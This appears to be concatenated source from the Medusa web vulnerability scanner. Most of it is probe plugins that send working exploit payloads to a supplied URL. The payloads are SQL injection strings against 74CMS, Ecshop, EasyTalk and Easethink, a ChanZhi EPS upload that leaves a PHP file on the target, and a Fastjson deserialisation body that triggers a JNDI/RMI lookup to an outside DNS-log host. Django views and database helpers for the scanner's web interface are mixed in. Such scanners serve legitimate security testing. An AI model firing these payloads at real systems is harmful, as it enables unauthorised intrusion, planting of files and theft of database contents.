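def medusa(Url, RandomAgent, UnixTimestamp):
    """Check a 74CMS target through ``/plus/ajax_user.php?act=check_email``.

    Sends one POST with a fixed probe body and records a finding when the
    expected MD5 marker appears in the response text.

    Args:
        Url: Target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Passed to ``VulnerabilityDetails`` together with the finding.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fall back to the scheme's default port when the URL names none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/plus/ajax_user.php?act=check_email"
        data = "email=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),2,1))>100 as signed) %23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # The session is closed on exit so its pooled connection is released.
        # NOTE(review): verify=False turns off TLS certificate validation.
        with requests.session() as s:
            resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False)
        con = resp.text
        if '4a8a08f09d37b73795649038408b5f33' in con:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the target and the collected finding.
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # Write the result to a file named after the target.
            # NOTE(review): url becomes a file name here; confirm WriteFile sanitises it.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # Log the target and the name of the failing plugin.
        _l = ErrorLog().Write(url, _)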
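def medusa(**kwargs) -> None:
    """Check a ChanZhi EPS target for the package-upload issue.

    Posts a fixed multipart body to the package upload endpoint, then
    requests the expected upload location and records a finding when the
    MD5 marker appears in that second response.

    Keyword Args:
        Url: Base URL of the target.
        Headers: Headers sent with both requests.
        Proxies: Proxy mapping handed to ``requests``.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload = '/chanzhi/admin.php?m=package&f=upload'
        verify = '/chanzhi/system/tmp/package/php.php'
        payload_url = url + payload
        verify_url = url + verify
        # NOTE(review): the body is kept on one line exactly as found; confirm
        # the intended line breaks of the multipart body against upstream.
        data = """ ------WebKitFormBoundaryGgFOYWAluy1F8lvn Content-Disposition: form-data; name="file"; filename="php.php" Content-Type: text/php <?php echo md5(c);> ------WebKitFormBoundaryGgFOYWAluy1F8lvn-- """
        # NOTE(review): nothing in this function removes the uploaded file, so
        # a positive check leaves php.php behind on the target.
        requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)
        resp = requests.get(verify_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if "4a8a08f09d37b73795649038408b5f33" in con:
            Medusa = "{}存在ChanZhiEPSGetShell漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the response and the collected finding.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() keeps the handler from raising when the plugin name or the
        # URL is None, which plain string concatenation would do.
        _l = ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)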
def medusa(Url, RandomAgent, Token, proxies=None):
    """Check a 74CMS target through ``admin_baiduxml.php?ac=setsave``.

    Sends one POST with a fixed form body and records a finding when the
    response contains both the query-error text and the echoed value.

    Args:
        Url: Target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        Token: Passed to ``VulnerabilityDetails`` together with the finding.
        proxies: Proxy setting, normalised through ``Proxies().result``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme only when the URL carries none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = '/upload/admin/admin_baiduxml.php?ac=setsave'
        data = "xmlmax=1111&xmlpagesize=112&sunrain'=aaa"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.post(
            payload_url,
            data=data,
            headers=headers,
            proxies=proxies,
            timeout=6,
            verify=False,
        )
        con = resp.text
        code = resp.status_code  # read but not used by the check below
        error_shown = "Error:Query error" in con
        value_echoed = "value='aaa'" in con
        if error_shown and value_echoed:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the target and the collected finding.
            VulnerabilityDetails(_t.info, url, Token).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # Log the target and the name of the failing plugin.
        _l = ErrorLog().Write(url, _)
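def medusa(**kwargs) -> None:
    """Check a target for the Fastjson deserialisation issue via a DNS log.

    Posts a fixed JSON body that references the host name returned by
    ``Dnslog().dns_host()`` and records a finding when the DNS log reports a
    hit and the target answered with HTTP 400.

    Keyword Args:
        Url: URL the JSON body is posted to.
        Headers: Request headers; copied before this plugin adds its own.
        Proxies: Proxy mapping handed to ``requests``.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload_url = url
        DL = Dnslog()
        data = '''{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://%s/Exploit", "autoCommit": true } } ''' % DL.dns_host()
        # Work on a copy: the caller's Headers mapping is handed to this
        # function by reference, and setting keys on it would change what the
        # caller (and anything else sharing that mapping) sends afterwards.
        Headers = Headers.copy()
        Headers['Content-Type'] = 'application/json'
        Headers["Connection"] = "close"
        resp = requests.post(payload_url, headers=Headers, data=data, proxies=proxies, timeout=10, verify=False)
        if DL.result() and resp.status_code == 400:
            Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
                url, payload_url, resp.text, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            # Hand over the response and the collected finding.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() keeps the handler from raising when the plugin name or the
        # URL is None, which plain string concatenation would do.
        _l = ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)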
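def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check an Easethink target for the cookie injection issue.

    Posts to ``/index.php`` with a fixed ``cookie`` header and records a
    finding when the response is HTTP 200 and contains the expected marker.

    Args:
        Url: Target URL; split by ``UrlProcessing().result``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        proxies: Proxy setting, normalised through ``Proxies().result``.
        **kwargs: Forwarded to ``VulnerabilityDetails``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's default port when the URL names none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/index.php"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'cookie': 'sort_field_idx=1=extractvalue(1,concat(0x5c,md5(1)))',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        resp = requests.post(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        # The marker is 31 hex characters long; presumably the error text
        # truncates the digest, TODO confirm before "correcting" it to 32.
        if code == 200 and "c4ca4238a0b923820dcc509a6f75849" in con:
            Medusa = "{}存在EasethinkCookie注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the target and the collected finding.
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() keeps the handler from raising when the plugin name is
        # None, which plain string concatenation would do.
        _l = ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)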
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check a 74CMS target through ``admin_category.php?ac=edit_color_save``.

    Sends one POST with a fixed form body and records a finding when the
    expected MD5 marker appears in the response text.

    Args:
        Url: Target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        proxies: Proxy setting, normalised through ``Proxies().result``.
        **kwargs: Forwarded to ``VulnerabilityDetails``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme only when the URL carries none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = '/upload/admin/admin_category.php?ac=edit_color_save'
        data = "val=xx&id=1 union select md5(c),2,3,4"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.post(
            payload_url,
            data=data,
            headers=headers,
            proxies=proxies,
            timeout=6,
            verify=False,
        )
        con = resp.text
        code = resp.status_code  # read but not used by the check below
        marker_found = "4a8a08f09d37b73795649038408b5f33" in con
        if marker_found:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the target and the collected finding.
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # Log the target and the name of the failing plugin.
        _l = ErrorLog().Write(url, _)
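def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check a 74CMS target through ``ajax_common.php?act=hotword``.

    Sends one GET with a fixed query string and records a finding when the
    expected MD5 marker appears in the response text. Only the marker probe
    is kept: the second request string the function used to define was never
    sent and played no part in the check.

    Args:
        Url: Target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        proxies: Proxy setting, normalised through ``Proxies().result``.
        **kwargs: Forwarded to ``VulnerabilityDetails``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Fall back to the scheme's default port when the URL names none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(736482),3%23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if '5cee14937d463a819651c8e1c504613c' in con:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the target and the collected finding.
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # Log the target and the name of the failing plugin.
        _l = ErrorLog().Write(url, _)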
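def GenerateWord(request):
    """Generate a Word report for one scan and return its file name.

    Expects a POST whose JSON body carries ``sid`` and ``token``. The token
    is resolved to a user name; the scan results for that ``sid`` and user
    are rendered with ``GenerateWordReport`` and the resulting file name is
    recorded through ``ReportGenerationList().Write``.

    Returns:
        A ``JsonResponse`` with ``code`` 200 and the file name, 404 when the
        report could not be generated, 403 when the token matches no user,
        or 500 for a non-POST request or an unexpected error.
    """
    RequestLogRecord(request, request_api="generate_word")
    if request.method == "POST":
        try:
            # The body is parsed once; sid and token identify the task and user.
            Body = json.loads(request.body)
            Sid = Body["sid"]
            UserToken = Body["token"]
            # Resolve the token to a user name (None when the token is unknown).
            UserName = UserInfo().QueryUserNameWithToken(UserToken)
            UserOperationLogRecord(request,
                                   request_api="generate_word",
                                   uid=UserName)
            if UserName != None:  # the token belongs to a user
                # Fetch the finding list and target URL, scoped to this user.
                VulnerabilityDataList, Url = MedusaQuery().QueryBySid(
                    sid=Sid, uid=UserName)
                WordDownloadFileName = GenerateWordReport(
                    VulnerabilityDataList=VulnerabilityDataList,
                    target_url=Url)
                if WordDownloadFileName != None:
                    # Record which user owns the generated file.
                    ReportGenerationList().Write(
                        sid=Sid, uid=UserName,
                        file_name=WordDownloadFileName)
                    return JsonResponse({
                        'message': WordDownloadFileName,
                        'code': 200,
                    })
                else:
                    return JsonResponse({
                        'message': '报告生成失败了!🐈',
                        'code': 404,
                    })
            else:
                # Without this branch an unknown token made the view return
                # None instead of a response.
                return JsonResponse({
                    'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧",
                    'code': 403,
                })
        except Exception as e:
            ErrorLog().Write("Web_Api_GenerateReport_GenerateWord(def)", e)
            return JsonResponse({
                'message': '莎酱被玩坏啦(>^ω^<)喵',
                'code': 500,
            })
    else:
        return JsonResponse({
            'message': '请使用Post请求',
            'code': 500,
        })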
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check an Ecshop target through ``/admin/affiliate_ck.php``.

    Sends one POST with a fixed query string and body and records a finding
    when the expected MD5 marker appears in the response text.

    Args:
        Url: Target URL; split by ``UrlProcessing().result``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        proxies: Proxy setting, normalised through ``Proxies().result``.
        **kwargs: Forwarded to ``VulnerabilityDetails``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when the URL carries none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/admin/affiliate_ck.php?act=list&auid=3+and+updatexml(1,concat(0x7e,concat(md5(c),0x3a,user()),0x7e),1)"
        data = "status=1&order_sn=2"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/json",
        }
        resp = requests.post(
            payload_url,
            headers=headers,
            data=data,
            timeout=6,
            proxies=proxies,
            verify=False,
        )
        con = resp.text
        code = resp.status_code  # read but not used by the check below
        marker_found = "4a8a08f09d37b73795649038408b5f33" in con
        if marker_found:
            Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the target and the collected finding.
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # Log the target and the name of the failing plugin.
        _l = ErrorLog().Write(url, _)
def DeleteProject(request):
    """Delete one of the calling user's XSS projects.

    Expects a POST whose JSON body carries ``token`` and ``project_name``.
    The token is resolved to a UID and the delete is scoped to that UID.

    Returns:
        A ``JsonResponse`` with ``code`` 200 on success, 170 when the delete
        failed, 403 when the token matches no user, 169 on an unexpected
        error, or 500 for a non-POST request.
    """
    RequestLogRecord(request, request_api="delete_cross_site_script_project")
    # Reject anything that is not a POST before touching the body.
    if request.method != "POST":
        return JsonResponse({
            'message': '请使用Post请求',
            'code': 500,
        })
    try:
        UserToken = json.loads(request.body)["token"]
        ProjectName = json.loads(request.body)["project_name"]
        # Resolve the token to a UID (None when the token is unknown).
        Uid = UserInfo().QueryUidWithToken(UserToken)
        if Uid == None:
            return JsonResponse({
                'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧",
                'code': 403,
            })
        UserOperationLogRecord(
            request,
            request_api="delete_cross_site_script_project",
            uid=Uid)
        # The delete is keyed on both the UID and the project name.
        Result = CrossSiteScriptProject().Delete(
            uid=Uid, project_name=ProjectName)
        if Result:
            return JsonResponse({
                'message': "删除成功~",
                'code': 200,
            })
        return JsonResponse({
            'message': "项目删除失败!",
            'code': 170,
        })
    except Exception as e:
        ErrorLog().Write(
            "Web_CrossSiteScriptHub_CrossSiteScript_DeleteProject(def)", e)
        return JsonResponse({
            'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)',
            'code': 169,
        })
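def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check a 74CMS target through ``ajax_officebuilding.php?act=key``.

    Sends one GET with a fixed query string and records a finding when the
    expected MD5 marker appears in the response text.

    Args:
        Url: Target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        proxies: Proxy setting, normalised through ``Proxies().result``.
        **kwargs: Forwarded to ``VulnerabilityDetails``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Fall back to the scheme's default port when the URL names none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/plus/ajax_officebuilding.php?act=key&key=asd%錦%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if '3438d5e3ead84b2effc5ec33ed1239f5' in con:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the target and the collected finding.
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() keeps the handler from raising when the plugin name is
        # None, which plain string concatenation would do.
        _l = ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)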
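def UpdateShowName(request):
    """Update the display name of the user identified by the posted token.

    Expects a POST whose JSON body carries ``token`` and ``new_show_name``.

    Returns:
        A ``JsonResponse`` with ``code`` 200 on success, 404 when the update
        did not apply, 403 when the token matches no user, or 500 for a
        non-POST request or an unexpected error.
    """
    RequestLogRecord(request, request_api="update_show_name")
    if request.method == "POST":
        try:
            Body = json.loads(request.body)
            Token = Body["token"]
            NewShowName = Body["new_show_name"]
            # Resolve the token to a UID (None when the token is unknown).
            Uid = UserInfo().QueryUidWithToken(Token)
            if Uid != None:
                # Only log the operation once the user is known.
                UserOperationLogRecord(request, request_api="update_show_name", uid=Uid)
                UpdateShowNameResult = UserInfo().UpdateShowName(uid=Uid, show_name=NewShowName)
                if UpdateShowNameResult:
                    return JsonResponse({'message': '好诶!修改成功~', 'code': 200, })
                else:
                    return JsonResponse({'message': "输入信息有误重新输入", 'code': 404, })
            else:
                return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
        except Exception as e:
            ErrorLog().Write("Web_BasicFunctions_User_UpdateShowName(def)", e)
            # Without a return here a malformed body made the view return
            # None instead of a response.
            return JsonResponse({'message': '莎酱被玩坏啦(>^ω^<)喵', 'code': 500, })
    else:
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })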
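def UpdateKey(request):
    """Replace the key of the user identified by the posted token.

    Expects a POST whose JSON body carries ``token``. A new 40-character key
    is generated with ``randoms().result(40)`` and stored for that user.

    Returns:
        A ``JsonResponse`` with ``code`` 200 on success, 404 when the update
        did not apply, 403 when the token matches no user, or 500 for a
        non-POST request or an unexpected error.
    """
    RequestLogRecord(request, request_api="update_key")
    if request.method == "POST":
        try:
            Token = json.loads(request.body)["token"]
            # Collisions between generated keys are possible but not handled;
            # the author considered the probability negligible.
            # NOTE(review): presumably this key authenticates the user; confirm
            # randoms() draws from a CSPRNG (e.g. the secrets module).
            NewKey = randoms().result(40)
            # Resolve the token to a UID (None when the token is unknown).
            Uid = UserInfo().QueryUidWithToken(Token)
            if Uid != None:
                # Only log the operation once the user is known.
                UserOperationLogRecord(request, request_api="update_key", uid=Uid)
                UpdateKeyResult = UserInfo().UpdateKey(uid=Uid, key=NewKey)
                if UpdateKeyResult:
                    return JsonResponse({'message': '呐呐呐呐!修改成功了呢~', 'code': 200, })
                else:
                    return JsonResponse({'message': "输入信息有误重新输入", 'code': 404, })
            else:
                return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
        except Exception as e:
            ErrorLog().Write("Web_BasicFunctions_User_UpdateKey(def)", e)
            # Without a return here a malformed body made the view return
            # None instead of a response.
            return JsonResponse({'message': '莎酱被玩坏啦(>^ω^<)喵', 'code': 500, })
    else:
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })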
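def Creation(request):
    """Create an e-mail project for the user identified by the posted token.

    Expects a POST whose JSON body carries ``token``. A 10-character project
    key is generated with ``randoms().result(10)`` and stored for that user.

    Returns:
        A ``JsonResponse`` with ``code`` 200 and the new key, 505 when the
        write failed, 403 when the token matches no user, or 500 for a
        non-POST request or an unexpected error.
    """
    RequestLogRecord(request, request_api="create_email_project")
    if request.method == "POST":
        try:
            Token = json.loads(request.body)["token"]
            # Resolve the token to a UID (None when the token is unknown).
            Uid = UserInfo().QueryUidWithToken(Token)
            if Uid != None:
                # Only log the operation once the user is known.
                UserOperationLogRecord(request, request_api="create_email_project", uid=Uid)
                # NOTE(review): if this key gates access to the project,
                # confirm randoms() draws from a CSPRNG.
                Key = randoms().result(10)
                Result = EmailProject().Write(uid=Uid, project_key=Key)
                if Result:
                    return JsonResponse({'message': Key, 'code': 200, })
                else:
                    return JsonResponse({'message': "创建失败!", 'code': 505, })
            else:
                return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
        except Exception as e:
            ErrorLog().Write("Web_Email_EmailProject_Creation(def)", e)
            # Without a return here a malformed body made the view return
            # None instead of a response.
            return JsonResponse({'message': '莎酱被玩坏啦(>^ω^<)喵', 'code': 500, })
    else:
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })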
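def VulnerabilityDistribution(self, **kwargs):
    """Count one user's ``Medusa`` rows per timestamp within a time range.

    Keyword Args:
        uid: User whose rows are counted.
        start_time: Lower bound of ``timestamp`` (inclusive).
        end_time: Upper bound of ``timestamp`` (inclusive).

    Returns:
        A list of ``(timestamp, count)`` tuples sorted by timestamp, or
        ``None`` when the query fails.
    """
    Uid = kwargs.get("uid")
    StartTime = kwargs.get("start_time")
    EndTime = kwargs.get("end_time")
    try:
        # Parameterised query: the bounds and uid are bound, never interpolated.
        self.cur.execute("select timestamp from Medusa where uid =? and timestamp<=? and timestamp>=?", (Uid, EndTime, StartTime,))
        # Tally in a single pass; calling list.count() once per distinct
        # value, as before, rescans every row each time.
        CountDict = {}
        for row in self.cur.fetchall():
            CountDict[row[0]] = CountDict.get(row[0], 0) + 1
        # Sort by timestamp before returning.
        SortResult = sorted(CountDict.items(), key=lambda item: item[0])
        return SortResult
    except Exception as e:
        ErrorLog().Write("Web_WebClassCongregation_HomeInfo(class)_TimeDistribution(def)", e)
        return None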
def Query(self, **kwargs) -> bool or None:
    """Report whether a generated report file belongs to the given user.

    Keyword Args:
        uid: User the file should belong to.
        file_name: Name of the report file.

    Returns:
        ``True`` when a matching row exists, ``False`` when none does, and
        ``None`` when the query fails.
    """
    # NOTE(review): the annotation ``bool or None`` evaluates to plain
    # ``bool``; the None return is only documented here.
    Uid = kwargs.get("uid")
    FileName = kwargs.get("file_name")
    try:
        self.cur.execute(
            "select * from ReportGenerationList where file_name =? and uid=?",
            (FileName, Uid,))
        rows = self.cur.fetchall()
        if not rows:
            # NOTE(review): the connection is left open on this path and is
            # only closed when a row was found.
            return False
        self.con.close()
        return True
    except Exception as e:
        ErrorLog().Write(
            "Web_WebClassCongregation_ReportGenerationList(class)_QueryTokenValidity(def)",
            e)
        return None
def TokenAuthentication( self, **kwargs: str ) -> bool or None:
    """Report whether a user token exists in ``UserInfo``.

    Keyword Args:
        token: Token to look up.

    Returns:
        ``True`` when the token exists, ``False`` when it does not or none
        was supplied, and ``None`` when the query fails.
    """
    # NOTE(review): the annotation ``bool or None`` evaluates to plain
    # ``bool``; the None return is only documented here.
    Token = kwargs.get("token")
    if Token == None:
        return False
    try:
        self.cur.execute("select * from UserInfo where token =?", (Token, ))
        rows = self.cur.fetchall()
        if not rows:
            # NOTE(review): the connection is left open on this path and is
            # only closed when the token was found.
            return False
        self.con.close()
        return True
    except Exception as e:
        ErrorLog().Write(
            "Web_WebClassCongregation_UserInfo(class)_TokenAuthentication(def)",
            e)
        return None
def Monitor():
    """Sample memory and CPU usage and store one record in the database.

    Reads the values from ``psutil`` and writes them through
    ``HardwareUsageRateInfo().Write``. Any failure is logged, not raised.
    """
    try:
        mem = psutil.virtual_memory()  # full memory statistics
        # used = total physical memory - available memory
        used_bytes = mem.total - mem.available
        free_bytes = mem.available
        used_percent = mem.percent
        # Overall CPU usage, measured over a one-second interval.
        cpu_total = psutil.cpu_percent(1)
        # Usage of each individual CPU.
        cpu_per_core = psutil.cpu_percent(percpu=True)
        # The per-core list is stored as its string representation.
        HardwareUsageRateInfo().Write(
            memory_free=free_bytes,
            memory_percent=used_percent,
            memory_used=used_bytes,
            central_processing_unit_usage_rate=cpu_total,
            per_core_central_processing_unit_usage_rate=str(cpu_per_core))
    except Exception as e:
        ErrorLog().Write("Web_SystemInfo_HardwareInfo_Monitor(def)", e)
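def medusa(**kwargs)->None:
    """Check an EasyTalk target through the ``myapp`` keyword parameter.

    Sends one GET with a fixed query string and records a finding when the
    response is HTTP 200 and contains the expected MD5 marker.

    Keyword Args:
        Url: Base URL of the target.
        Headers: Headers sent with the request.
        Proxies: Proxy mapping handed to ``requests``.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload = "/?m=app&a=myapp&keyword=yu%'union select 1,2,3,4,md5(c),6,7,8,9,10,11,12,13,14,15,16,17#"
        payload_url = url + payload
        resp = requests.get(payload_url, headers=Headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and "4a8a08f09d37b73795649038408b5f33" in con:
            Medusa = "{}存在EasyTalkSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the response and the collected finding.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() keeps the handler from raising when the plugin name or the
        # URL is None, which plain string concatenation would do.
        _l = ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)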
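def medusa(**kwargs)->None:
    """Check whether ``/pma/`` on port 888 serves phpMyAdmin without login.

    Rewrites the target URL to port 888, requests ``/pma/`` and records a
    finding when the response is HTTP 200 and contains the three expected
    page strings.

    Keyword Args:
        Url: Base URL of the target.
        Headers: Headers sent with the request.
        Proxies: Proxy mapping handed to ``requests``.
    """
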